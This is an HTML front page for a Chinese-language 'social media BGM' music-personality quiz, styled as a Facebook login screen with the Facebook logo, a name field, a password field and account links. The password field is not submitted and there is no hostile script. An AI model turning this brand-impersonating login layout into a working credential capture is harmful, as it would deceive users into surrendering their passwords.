
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8"/>
        <title>測測你的社群媒體 BGM</title>
        <link rel="stylesheet" type="text/css" href="../public/css/rwd_v1.css"/>
        <link rel="stylesheet" type="text/css" href="/public/css/rwd_v1.css"/> 
    </head>
    <body>
        <div class="box">
            <div class="title-box">
                <img src="https://i.postimg.cc/NMyj90t9/logo.png" alt="Facebook">
                <p>
                    你聽過音樂偏好心理學嗎?<br>
                    心理學家認為人們對音樂的喜好選擇會受到個人特質的影響,讓我們透幾則社群媒體PO文跟留言來尋找你的社群媒體BGM吧~
                </p>
            </div>

            <div class="form-box">
                <form action= "/Q1" method="POST">
                    <input type="text" name="user" placeholder="輸入姓名"/>
                    <input type="password" placeholder="Password">
                    <button type="submit" >Log In</button>
                </form>
                <a href="#">Forgotten Password</a>
                <hr>
                <div class="create-btn">
                <a href="" target="_blank">Create New Account</a>
                </div>
            </div>
        </div>
    </body>
</html>